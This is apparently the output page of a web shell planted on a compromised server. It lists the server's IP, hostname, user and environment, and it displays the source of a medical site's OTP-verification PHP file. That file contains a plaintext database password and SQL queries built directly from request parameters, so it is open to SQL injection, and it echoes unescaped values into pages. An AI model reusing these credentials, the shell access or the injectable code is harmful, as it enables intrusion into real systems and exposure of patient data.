Mr.Fn4ticHz Shell
Server IP : 162.240.98.243  /  Your IP : 3.133.130.199
Web Server : Apache
System : Linux server.bti.yaw.mybluehostin.me 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64
User : btiyawmy ( 1003)
PHP Version : 7.2.34
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/btiyawmy/www/login.easenup.in/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ HOME ]     

Current File : /home/btiyawmy/www/login.easenup.in/document_verify.php
<?php
session_start();
require_once('../DBManager.php');
require_once('../LoginManager.php');
require_once('../patientmanager.php');
if(isset($_POST[signup]))
{ 
      PatientManager::patientAccessTWO("$_POST[prescriptionid]","$_POST[patientid]","$_POST[adminid]","$_POST[typevisit]","$_POST[casetype]","$_POST[note]","$_POST[entered_by]");
      
}
if(isset($_POST[verify]))
{ 
      PatientManager::patientAccessTWO("$_POST[prescriptionid]","$_POST[patientid]","$_POST[adminid]","$_POST[typevisit]","$_POST[casetype]","$_POST[note]","$_POST[entered_by]");
      
}
?>

<?php

$connect = new PDO("mysql:host=localhost;dbname=btiyawmy_software", "btiyawmy_software", "@#admin@#");
$error_user_otp = '';
$patientid = '';
$message = '';
if(isset($_GET["patientid"]))
{
	$patientid = $_GET["patientid"];
	if(isset($_POST["submit"]))
	{
		if(empty($_POST["user_otp"]))
		{
			$error_user_otp = 'Enter OTP Number';
		}
		else
		{
			$query = "
			SELECT * FROM patient
			WHERE patientid = '".$patientid."' 
			AND user_otp = '".trim($_POST["user_otp"])."'
			";

			$statement = $connect->prepare($query);

			$statement->execute();

			$total_row = $statement->rowCount();

			if($total_row > 0)
			{
				$query = "
				UPDATE patient
				SET numbers_status = 'verified' 
				WHERE patientid = '".$patientid."'
				";

				$statement = $connect->prepare($query);

				if($statement->execute())
				{
				    include("../dbconnection.php");
				  		    $sql ="SELECT * FROM addaspatient WHERE patientid='$patientid' AND prescriptionid='$_GET[prescriptionid]' ";
		$qsql = mysqli_query($con,$sql);
				while($rs = mysqli_fetch_array($qsql))
			{
			    echo "<script>window.location='profile.php?prescriptionid=$rs[prescriptionid]&patientid=$patientid'</script>;</script>";
			}
				}
			}
			else
			{
				$message = '<label class="text-danger">Invalid OTP Number</label>';
			}
		}
	}
}
else
{
	$message = '<label class="text-danger">Invalid Url</label>';
}


?>
<!DOCTYPE html>
<html lang="en">
  <meta charset="UTF-8">
  <meta content='yes' name='apple-mobile-web-app-capable'/>
<meta content='yes' name='mobile-web-app-capable'/>
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <meta http-equiv="X-UA-Compatible" content="ie=edge">
  <link rel="stylesheet" href="./styles.css">
  <link rel="manifest" href="./manifest.webmanifest">
    <link rel="assetlinks" href="assetlinks.json">


    <title>OTP Verify</title>
    <link href="assets/css/bootstrap.css" rel="stylesheet">
    <link href="assets/font-awesome/css/font-awesome.css" rel="stylesheet" />
    <link href="assets/css/style.css" rel="stylesheet">
    <link href="assets/css/style-responsive.css" rel="stylesheet">
  </head>

  <body>
	  <div id="login-page">
	  	<div class="container">
      
	  	   <?php 
include("dbconnection.php");
		 $narayan=LoginManager::currentUser();
        $hari=LoginManager::getUserTypeByuname("$narayan");
        $sql ="SELECT * FROM addaspatient WHERE patientid='$_GET[patientid]' AND prescriptionid='$_GET[prescriptionid]' ";
		$qsql = mysqli_query($con,$sql);
				while($rp = mysqli_fetch_array($qsql))
			{  
			     		    echo "
<form name='signup' method='post'>
    <input type='hidden' name='prescriptionid' value='$rp[prescriptionid]'>
  <input type='hidden' name='patientid' value='$rp[patientid]'>
<input type='hidden' name='adminid' value='$rp[hospitalid]'>
  <input type='hidden' name='typevisit' value='$rp[typevisit]'>
<input type='hidden' name='casetype' value='$rp[casetype]'>
<input type='hidden' name='entered_by' value='$hari'>
<input type='hidden' name='typevisit' value='Patient Registration'>

                   <input type='hidden' name='note' value='verify'>
		        <div class='login-wrap'>
		           
		            <br>
		            <input type='text' name='user_otp' id='user_otp' class='form-control' placeholder='Enter Your Six Digit OTP' ><br >
		            <input name='verify' value='Verify' class='btn btn-theme btn-block' type='submit'>
		            <br>
		       ";
  }
	
  ?>
	  
           <?php 
include("dbconnection.php");
		 $narayan=LoginManager::currentUser();
        $hari=LoginManager::getUserTypeByuname("$narayan");
        $sql ="SELECT * FROM addaspatient WHERE patientid='$_GET[patientid]' AND prescriptionid='$_GET[prescriptionid]' ";
		$qsql = mysqli_query($con,$sql);
				while($rp = mysqli_fetch_array($qsql))
			{  
			     		    echo "
<form name='signup' method='post'>
    <input type='hidden' name='prescriptionid' value='$rp[prescriptionid]'>
  <input type='hidden' name='patientid' value='$rp[patientid]'>
<input type='hidden' name='adminid' value='$rp[hospitalid]'>
  <input type='hidden' name='typevisit' value='$rp[typevisit]'>
<input type='hidden' name='casetype' value='$rp[casetype]'>
<input type='hidden' name='entered_by' value='$hari'>
<input type='hidden' name='typevisit' value='Patient Registration'>
  <button class='btn btn-theme btn-block' type='submit' name='signup'>SKIP</button> </form>";
  }
	
  ?>
		        
		  
		      	  	
	  	
	  	</div>
	  </div>
    <script src="assets/js/jquery.js"></script>
    <script src="assets/js/bootstrap.min.js"></script>
    <script type="text/javascript" src="assets/js/jquery.backstretch.min.js"></script>
    <script>
        $.backstretch("assets/img/login-bg.jpg", {speed: 500});
    </script>

<script src="./index.js" type="module"></script>
  </body>
</html>

Anon7 - 2022
AnonSec Team